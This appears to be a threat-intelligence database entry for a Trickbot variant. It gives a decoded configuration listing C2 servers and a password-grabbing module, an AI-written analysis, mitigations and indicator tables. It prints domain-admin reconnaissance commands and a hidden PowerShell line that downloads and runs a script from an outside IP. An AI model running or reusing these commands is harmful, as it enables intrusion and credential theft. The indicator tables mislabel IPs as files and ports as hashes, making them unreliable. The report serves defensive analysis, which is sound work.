Trickbot Gtag lib693/tt0002
./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini Searching the charset... [+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy <mcconf> <ver>1000503</ver> <gtag>tt0002</gtag> <servs> <srv>5.182.210.226:443</srv> <srv>192.210.226.106:443</srv> <srv>51.254.164.244:443</srv> <srv>45.148.120.153:443</srv> <srv>195.123.239.67:443</srv> <srv>194.5.250.150:443</srv> <srv>217.12.209.200:443</srv> <srv>185.99.2.221:443</srv> <srv>51.254.164.245:443</srv> <srv>185.62.188.159:443</srv> <srv>46.17.107.65:443</srv> <srv>185.20.185.76:443</srv> <srv>185.203.118.37:443</srv> <srv>146.185.253.178:443</srv> <srv>185.14.31.252:443</srv> <srv>185.99.2.115:443</srv> <srv>172.245.156.138:443</srv> <srv>51.89.73.158:443</srv> <srv>190.214.13.2:449</srv> <srv>181.140.173.186:449</srv> <srv>181.129.104.139:449</srv> <srv>181.113.28.146:449</srv> <srv>181.112.157.42:449</srv> <srv>170.84.78.224:449</srv> <srv>200.21.51.38:449</srv> <srv>46.174.235.36:449</srv> <srv>36.89.85.103:449</srv> <srv>181.129.134.18:449</srv> <srv>186.71.150.23:449</srv> <srv>131.161.253.190:449</srv> <srv>200.127.121.99:449</srv> <srv>114.8.133.71:449</srv> <srv>119.252.165.75:449</srv> <srv>121.100.19.18:449</srv> <srv>202.29.215.114:449</srv> <srv>180.180.216.177:449</srv> <srv>171.100.142.238:449</srv> <srv>186.232.91.240:449</srv> <srv>181.196.207.202:449</srv> </servs> <autorun> <module name="pwgrab"/> </autorun> </mcconf> %WINDIR%\system32\cmd.exe /C net group "enterprise admins" /domain %WINDIR%\system32\cmd.exe /C net group "domain admins" /domain powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))"
AI Analysis
Technical Summary
The Trickbot Gtag lib693/tt0002 is a variant of the Trickbot malware family, a well-known modular banking Trojan and malware loader primarily used for credential theft, lateral movement, and payload delivery. The provided configuration snippet reveals a decoded configuration file (settings.ini) that includes a unique charset used for decoding, a version identifier (1000503), and a gtag (tt0002) which likely denotes a specific campaign or variant. The configuration lists multiple command and control (C2) servers distributed globally, using ports 443 and 449, indicating encrypted or disguised communication channels to evade detection. The autorun module specified is "pwgrab," which suggests the malware is configured to steal passwords or credentials from infected systems. The command line snippet shows execution of Windows commands to enumerate privileged groups such as "enterprise admins" and "domain admins" in the domain, followed by a PowerShell command that downloads and executes a remote script from an external IP address (http://66.42.99.79:80/q). This behavior is consistent with Trickbot’s known tactics of reconnaissance, credential harvesting, and subsequent deployment of additional payloads, potentially including Cobalt Strike beacons, as indicated by the tags. The malware leverages system utilities (cmd.exe, powershell.exe) with hidden windows and no profile loading to avoid user detection. No patches or known exploits are associated with this variant, and it does not require user interaction once executed, relying on prior infection vectors. The severity is marked as low in the source data, but this likely reflects the initial infection stage rather than the full impact potential of the malware family. Trickbot’s modular nature allows it to evolve and deploy additional malicious modules, making it a persistent threat in enterprise environments.
Potential Impact
For European organizations, the Trickbot Gtag lib693/tt0002 variant poses significant risks primarily through credential theft and lateral movement within corporate networks. Successful infections can lead to compromise of privileged accounts such as domain and enterprise administrators, enabling attackers to escalate privileges, move laterally, and deploy further payloads including ransomware or espionage tools. This can result in data breaches, operational disruption, and financial losses. The use of encrypted C2 channels and multiple fallback servers complicates detection and mitigation efforts. Given Trickbot’s history of targeting financial institutions, healthcare, and critical infrastructure, European organizations in these sectors are particularly at risk. The malware’s ability to download and execute remote scripts means attackers can adapt payloads dynamically, increasing the threat’s persistence and impact. Additionally, the presence of Cobalt Strike tooling suggests potential for advanced post-exploitation activities, including network reconnaissance and exfiltration. The low initial severity rating does not fully capture the threat’s potential to facilitate high-impact attacks, especially in complex enterprise environments with Active Directory domains. The threat also poses risks to supply chains and managed service providers within Europe, which can amplify the impact through interconnected networks.
Mitigation Recommendations
1. Implement robust network segmentation to limit lateral movement opportunities for malware that compromises credentials. 2. Enforce least privilege principles and regularly audit membership of privileged groups such as 'enterprise admins' and 'domain admins' to reduce attack surface. 3. Deploy endpoint detection and response (EDR) solutions capable of detecting suspicious PowerShell activity, command-line abuse, and unusual network connections to known Trickbot C2 IP addresses and ports (443, 449). 4. Utilize threat intelligence feeds to block or monitor traffic to the IP addresses listed in the malware configuration, especially those associated with Trickbot C2 infrastructure. 5. Harden PowerShell usage by enabling constrained language mode, disabling macros, and restricting execution policies to prevent unauthorized script execution. 6. Conduct regular credential hygiene practices including multi-factor authentication (MFA) for all privileged accounts and frequent password changes. 7. Monitor Active Directory logs for unusual queries or enumeration commands targeting privileged groups. 8. Employ network traffic analysis tools to detect encrypted outbound connections to suspicious IPs and ports, and implement egress filtering to restrict unauthorized external communications. 9. Provide targeted user awareness training focusing on phishing and social engineering, as Trickbot often uses these vectors for initial infection. 10. Prepare and test incident response plans specifically addressing credential theft and lateral movement scenarios to enable rapid containment and remediation.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Belgium
Indicators of Compromise
- file: 5.182.210.226
- hash: 443
- file: 192.210.226.106
- hash: 443
- file: 51.254.164.244
- hash: 443
- file: 45.148.120.153
- hash: 443
- file: 195.123.239.67
- hash: 443
- file: 194.5.250.150
- hash: 443
- file: 217.12.209.200
- hash: 443
- file: 185.99.2.221
- hash: 443
- file: 51.254.164.245
- hash: 443
- file: 185.62.188.159
- hash: 443
- file: 46.17.107.65
- hash: 443
- file: 185.20.185.76
- hash: 443
- file: 185.203.118.37
- hash: 443
- file: 146.185.253.178
- hash: 443
- file: 185.14.31.252
- hash: 443
- file: 185.99.2.115
- hash: 443
- file: 172.245.156.138
- hash: 443
- file: 51.89.73.158
- hash: 443
- file: 190.214.13.2
- hash: 449
- file: 181.140.173.186
- hash: 449
- file: 181.129.104.139
- hash: 449
- file: 181.113.28.146
- hash: 449
- file: 181.112.157.42
- hash: 449
- file: 170.84.78.224
- hash: 449
- file: 200.21.51.38
- hash: 449
- file: 46.174.235.36
- hash: 449
- file: 36.89.85.103
- hash: 449
- file: 181.129.134.18
- hash: 449
- file: 186.71.150.23
- hash: 449
- file: 131.161.253.190
- hash: 449
- file: 200.127.121.99
- hash: 449
- file: 114.8.133.71
- hash: 449
- file: 119.252.165.75
- hash: 449
- file: 121.100.19.18
- hash: 449
- file: 202.29.215.114
- hash: 449
- file: 180.180.216.177
- hash: 449
- file: 171.100.142.238
- hash: 449
- file: 186.232.91.240
- hash: 449
- file: 181.196.207.202
- hash: 449
- ip: 66.42.99.79
- text: ./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini Searching the charset... [+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy <mcconf> <ver>1000503</ver> <gtag>tt0002</gtag> <servs> <srv>5.182.210.226:443</srv> <srv>192.210.226.106:443</srv> <srv>51.254.164.244:443</srv> <srv>45.148.120.153:443</srv> <srv>195.123.239.67:443</srv> <srv>194.5.250.150:443</srv> <srv>217.12.209.200:443</srv> <srv>185.99.2.221:443</srv> <srv>51.254.164.245:443</srv> <srv>185.62.188.159:443</srv> <srv>46.17.107.65:443</srv> <srv>185.20.185.76:443</srv> <srv>185.203.118.37:443</srv> <srv>146.185.253.178:443</srv> <srv>185.14.31.252:443</srv> <srv>185.99.2.115:443</srv> <srv>172.245.156.138:443</srv> <srv>51.89.73.158:443</srv> <srv>190.214.13.2:449</srv> <srv>181.140.173.186:449</srv> <srv>181.129.104.139:449</srv> <srv>181.113.28.146:449</srv> <srv>181.112.157.42:449</srv> <srv>170.84.78.224:449</srv> <srv>200.21.51.38:449</srv> <srv>46.174.235.36:449</srv> <srv>36.89.85.103:449</srv> <srv>181.129.134.18:449</srv> <srv>186.71.150.23:449</srv> <srv>131.161.253.190:449</srv> <srv>200.127.121.99:449</srv> <srv>114.8.133.71:449</srv> <srv>119.252.165.75:449</srv> <srv>121.100.19.18:449</srv> <srv>202.29.215.114:449</srv> <srv>180.180.216.177:449</srv> <srv>171.100.142.238:449</srv> <srv>186.232.91.240:449</srv> <srv>181.196.207.202:449</srv> </servs> <autorun> <module name="pwgrab"/> </autorun> </mcconf>
- url: http://66.42.99.79:80/q
- text: %WINDIR%\system32\cmd.exe /C net group "enterprise admins" /domain
- text: %WINDIR%\system32\cmd.exe /C net group "domain admins" /domain
- text: %WINDIR%\system32\net1 config workstation
- text: %WINDIR%\System32\cmd.exe /c nltest /domain_trusts
- text: powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))"
- link: https://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/
- malware-sample: VMMM.exe|1853b48b655d5bd0a34791a93da8647c
- file: VMMM.exe
- hash: 1853b48b655d5bd0a34791a93da8647c
- hash: bfb30a9a08612be1a772fba531cf885bb8cf48aa
- hash: 281651b91568f18d3aca7c28d4f1b0f5220673736afb41a00c268cac2355bfc3
- size-in-bytes: 262144
- malware-sample: 0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe|05edcb0eb84c33833186465b81a7fe9c
- file: 0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe
- hash: 05edcb0eb84c33833186465b81a7fe9c
- hash: 8e8c984943d0bcde75c7306f0d7f80afaa65e18e
- hash: f3bc96c4ae65ade028cd97d9b7ae0d82251c4af20ec4cbc4cd1ffefa5ac90eb2
- size-in-bytes: 397312
- malware-sample: 61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe|2f1ac455d1c6e2a3f3e0d1137b047696
- file: 61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe
- hash: 2f1ac455d1c6e2a3f3e0d1137b047696
- hash: ba32c066d5927fa20b38d69357ce2ccee321b09a
- hash: cf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560
- size-in-bytes: 115712
Trickbot Gtag lib693/tt0002
Description
./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini Searching the charset... [+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy <mcconf> <ver>1000503</ver> <gtag>tt0002</gtag> <servs> <srv>5.182.210.226:443</srv> <srv>192.210.226.106:443</srv> <srv>51.254.164.244:443</srv> <srv>45.148.120.153:443</srv> <srv>195.123.239.67:443</srv> <srv>194.5.250.150:443</srv> <srv>217.12.209.200:443</srv> <srv>185.99.2.221:443</srv> <srv>51.254.164.245:443</srv> <srv>185.62.188.159:443</srv> <srv>46.17.107.65:443</srv> <srv>185.20.185.76:443</srv> <srv>185.203.118.37:443</srv> <srv>146.185.253.178:443</srv> <srv>185.14.31.252:443</srv> <srv>185.99.2.115:443</srv> <srv>172.245.156.138:443</srv> <srv>51.89.73.158:443</srv> <srv>190.214.13.2:449</srv> <srv>181.140.173.186:449</srv> <srv>181.129.104.139:449</srv> <srv>181.113.28.146:449</srv> <srv>181.112.157.42:449</srv> <srv>170.84.78.224:449</srv> <srv>200.21.51.38:449</srv> <srv>46.174.235.36:449</srv> <srv>36.89.85.103:449</srv> <srv>181.129.134.18:449</srv> <srv>186.71.150.23:449</srv> <srv>131.161.253.190:449</srv> <srv>200.127.121.99:449</srv> <srv>114.8.133.71:449</srv> <srv>119.252.165.75:449</srv> <srv>121.100.19.18:449</srv> <srv>202.29.215.114:449</srv> <srv>180.180.216.177:449</srv> <srv>171.100.142.238:449</srv> <srv>186.232.91.240:449</srv> <srv>181.196.207.202:449</srv> </servs> <autorun> <module name="pwgrab"/> </autorun> </mcconf> %WINDIR%\system32\cmd.exe /C net group "enterprise admins" /domain %WINDIR%\system32\cmd.exe /C net group "domain admins" /domain powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))"
AI-Powered Analysis
Technical Analysis
The Trickbot Gtag lib693/tt0002 is a variant of the Trickbot malware family, a well-known modular banking Trojan and malware loader primarily used for credential theft, lateral movement, and payload delivery. The provided configuration snippet reveals a decoded configuration file (settings.ini) that includes a unique charset used for decoding, a version identifier (1000503), and a gtag (tt0002) which likely denotes a specific campaign or variant. The configuration lists multiple command and control (C2) servers distributed globally, using ports 443 and 449, indicating encrypted or disguised communication channels to evade detection. The autorun module specified is "pwgrab," which suggests the malware is configured to steal passwords or credentials from infected systems. The command line snippet shows execution of Windows commands to enumerate privileged groups such as "enterprise admins" and "domain admins" in the domain, followed by a PowerShell command that downloads and executes a remote script from an external IP address (http://66.42.99.79:80/q). This behavior is consistent with Trickbot’s known tactics of reconnaissance, credential harvesting, and subsequent deployment of additional payloads, potentially including Cobalt Strike beacons, as indicated by the tags. The malware leverages system utilities (cmd.exe, powershell.exe) with hidden windows and no profile loading to avoid user detection. No patches or known exploits are associated with this variant, and it does not require user interaction once executed, relying on prior infection vectors. The severity is marked as low in the source data, but this likely reflects the initial infection stage rather than the full impact potential of the malware family. Trickbot’s modular nature allows it to evolve and deploy additional malicious modules, making it a persistent threat in enterprise environments.
Potential Impact
For European organizations, the Trickbot Gtag lib693/tt0002 variant poses significant risks primarily through credential theft and lateral movement within corporate networks. Successful infections can lead to compromise of privileged accounts such as domain and enterprise administrators, enabling attackers to escalate privileges, move laterally, and deploy further payloads including ransomware or espionage tools. This can result in data breaches, operational disruption, and financial losses. The use of encrypted C2 channels and multiple fallback servers complicates detection and mitigation efforts. Given Trickbot’s history of targeting financial institutions, healthcare, and critical infrastructure, European organizations in these sectors are particularly at risk. The malware’s ability to download and execute remote scripts means attackers can adapt payloads dynamically, increasing the threat’s persistence and impact. Additionally, the presence of Cobalt Strike tooling suggests potential for advanced post-exploitation activities, including network reconnaissance and exfiltration. The low initial severity rating does not fully capture the threat’s potential to facilitate high-impact attacks, especially in complex enterprise environments with Active Directory domains. The threat also poses risks to supply chains and managed service providers within Europe, which can amplify the impact through interconnected networks.
Mitigation Recommendations
1. Implement robust network segmentation to limit lateral movement opportunities for malware that compromises credentials. 2. Enforce least privilege principles and regularly audit membership of privileged groups such as 'enterprise admins' and 'domain admins' to reduce attack surface. 3. Deploy endpoint detection and response (EDR) solutions capable of detecting suspicious PowerShell activity, command-line abuse, and unusual network connections to known Trickbot C2 IP addresses and ports (443, 449). 4. Utilize threat intelligence feeds to block or monitor traffic to the IP addresses listed in the malware configuration, especially those associated with Trickbot C2 infrastructure. 5. Harden PowerShell usage by enabling constrained language mode, disabling macros, and restricting execution policies to prevent unauthorized script execution. 6. Conduct regular credential hygiene practices including multi-factor authentication (MFA) for all privileged accounts and frequent password changes. 7. Monitor Active Directory logs for unusual queries or enumeration commands targeting privileged groups. 8. Employ network traffic analysis tools to detect encrypted outbound connections to suspicious IPs and ports, and implement egress filtering to restrict unauthorized external communications. 9. Provide targeted user awareness training focusing on phishing and social engineering, as Trickbot often uses these vectors for initial infection. 10. Prepare and test incident response plans specifically addressing credential theft and lateral movement scenarios to enable rapid containment and remediation.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Threat Level
- 3
- Analysis
- 0
- Uuid
- 5e70a28a-d97c-47f6-a229-40990a0a020f
- Original Timestamp
- 1621850733
Indicators of Compromise
File
| Value | Description | Copy |
|---|---|---|
file5.182.210.226 | On port 443 | |
file192.210.226.106 | On port 443 | |
file51.254.164.244 | On port 443 | |
file45.148.120.153 | On port 443 | |
file195.123.239.67 | On port 443 | |
file194.5.250.150 | On port 443 | |
file217.12.209.200 | On port 443 | |
file185.99.2.221 | On port 443 | |
file51.254.164.245 | On port 443 | |
file185.62.188.159 | On port 443 | |
file46.17.107.65 | On port 443 | |
file185.20.185.76 | On port 443 | |
file185.203.118.37 | On port 443 | |
file146.185.253.178 | On port 443 | |
file185.14.31.252 | On port 443 | |
file185.99.2.115 | On port 443 | |
file172.245.156.138 | On port 443 | |
file51.89.73.158 | On port 443 | |
file190.214.13.2 | On port 449 | |
file181.140.173.186 | On port 449 | |
file181.129.104.139 | On port 449 | |
file181.113.28.146 | On port 449 | |
file181.112.157.42 | On port 449 | |
file170.84.78.224 | On port 449 | |
file200.21.51.38 | On port 449 | |
file46.174.235.36 | On port 449 | |
file36.89.85.103 | On port 449 | |
file181.129.134.18 | On port 449 | |
file186.71.150.23 | On port 449 | |
file131.161.253.190 | On port 449 | |
file200.127.121.99 | On port 449 | |
file114.8.133.71 | On port 449 | |
file119.252.165.75 | On port 449 | |
file121.100.19.18 | On port 449 | |
file202.29.215.114 | On port 449 | |
file180.180.216.177 | On port 449 | |
file171.100.142.238 | On port 449 | |
file186.232.91.240 | On port 449 | |
file181.196.207.202 | On port 449 | |
fileVMMM.exe | — | |
file0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe | — | |
file61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe | — |
Hash
| Value | Description | Copy |
|---|---|---|
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash443 | On port 443 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash449 | On port 449 | |
hash1853b48b655d5bd0a34791a93da8647c | — | |
hashbfb30a9a08612be1a772fba531cf885bb8cf48aa | — | |
hash281651b91568f18d3aca7c28d4f1b0f5220673736afb41a00c268cac2355bfc3 | — | |
hash05edcb0eb84c33833186465b81a7fe9c | — | |
hash8e8c984943d0bcde75c7306f0d7f80afaa65e18e | — | |
hashf3bc96c4ae65ade028cd97d9b7ae0d82251c4af20ec4cbc4cd1ffefa5ac90eb2 | — | |
hash2f1ac455d1c6e2a3f3e0d1137b047696 | — | |
hashba32c066d5927fa20b38d69357ce2ccee321b09a | — | |
hashcf99990bee6c378cbf56239b3cc88276eec348d82740f84e9d5c343751f82560 | — |
Ip
| Value | Description | Copy |
|---|---|---|
ip66.42.99.79 | — |
Text
| Value | Description | Copy |
|---|---|---|
text./trick_settings_decoder.py --brute --file ~/Downloads/settings.ini
Searching the charset...
[+] Decoded with matching charset: HJIA/CB+FGKLNOP3RSlUVWXYZfbcdeaghi5kmn0pqrstuvwx89o1246jMQDz7ETy
<mcconf>
<ver>1000503</ver>
<gtag>tt0002</gtag>
<servs>
<srv>5.182.210.226:443</srv>
<srv>192.210.226.106:443</srv>
<srv>51.254.164.244:443</srv>
<srv>45.148.120.153:443</srv>
<srv>195.123.239.67:443</srv>
<srv>194.5.250.150:443</srv>
<srv>217.12.209.200:443</srv>
<srv>185.99.2.221:443</srv>
<srv>51.254.164.245:443</srv>
<srv>185.62.188.159:443</srv>
<srv>46.17.107.65:443</srv>
<srv>185.20.185.76:443</srv>
<srv>185.203.118.37:443</srv>
<srv>146.185.253.178:443</srv>
<srv>185.14.31.252:443</srv>
<srv>185.99.2.115:443</srv>
<srv>172.245.156.138:443</srv>
<srv>51.89.73.158:443</srv>
<srv>190.214.13.2:449</srv>
<srv>181.140.173.186:449</srv>
<srv>181.129.104.139:449</srv>
<srv>181.113.28.146:449</srv>
<srv>181.112.157.42:449</srv>
<srv>170.84.78.224:449</srv>
<srv>200.21.51.38:449</srv>
<srv>46.174.235.36:449</srv>
<srv>36.89.85.103:449</srv>
<srv>181.129.134.18:449</srv>
<srv>186.71.150.23:449</srv>
<srv>131.161.253.190:449</srv>
<srv>200.127.121.99:449</srv>
<srv>114.8.133.71:449</srv>
<srv>119.252.165.75:449</srv>
<srv>121.100.19.18:449</srv>
<srv>202.29.215.114:449</srv>
<srv>180.180.216.177:449</srv>
<srv>171.100.142.238:449</srv>
<srv>186.232.91.240:449</srv>
<srv>181.196.207.202:449</srv>
</servs>
<autorun>
<module name="pwgrab"/>
</autorun>
</mcconf> | decoded trickbot config using https://github.com/hasherezade/malware_analysis/tree/master/trickbot | |
text%WINDIR%\system32\cmd.exe /C net group "enterprise admins" /domain | — | |
text%WINDIR%\system32\cmd.exe /C net group "domain admins" /domain | — | |
text%WINDIR%\system32\net1 config workstation | — | |
text%WINDIR%\System32\cmd.exe /c nltest /domain_trusts | — | |
textpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://66.42.99.79:80/q'))" | — |
Url
| Value | Description | Copy |
|---|---|---|
urlhttp://66.42.99.79:80/q | — |
Link
| Value | Description | Copy |
|---|---|---|
linkhttps://laskowski-tech.com/2020/03/16/breakout-time-trickbot-edition/ | — |
Malware sample
| Value | Description | Copy |
|---|---|---|
malware-sampleVMMM.exe|1853b48b655d5bd0a34791a93da8647c | — | |
malware-sample0gi7s88zgyl7qz9uwcwgcjigat_x2k3zrofs8xd_rfur2a61vxg28au9ha00n7pt.exe|05edcb0eb84c33833186465b81a7fe9c | — | |
malware-sample61y3xfon4je4qk9qm5zy6v3xhzlxf8ubmvbs567ig7snb8vqwb27xk7rb2vh2_yk.exe|2f1ac455d1c6e2a3f3e0d1137b047696 | — |
Size in-bytes
| Value | Description | Copy |
|---|---|---|
size-in-bytes262144 | — | |
size-in-bytes397312 | — | |
size-in-bytes115712 | — |
Threat ID: 682c7adee3e6de8ceb779223
Added to database: 5/20/2025, 12:51:42 PM
Last enriched: 6/19/2025, 2:19:30 PM
Last updated: 8/1/2025, 10:09:22 AM
Views: 13
Related Threats
Actions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.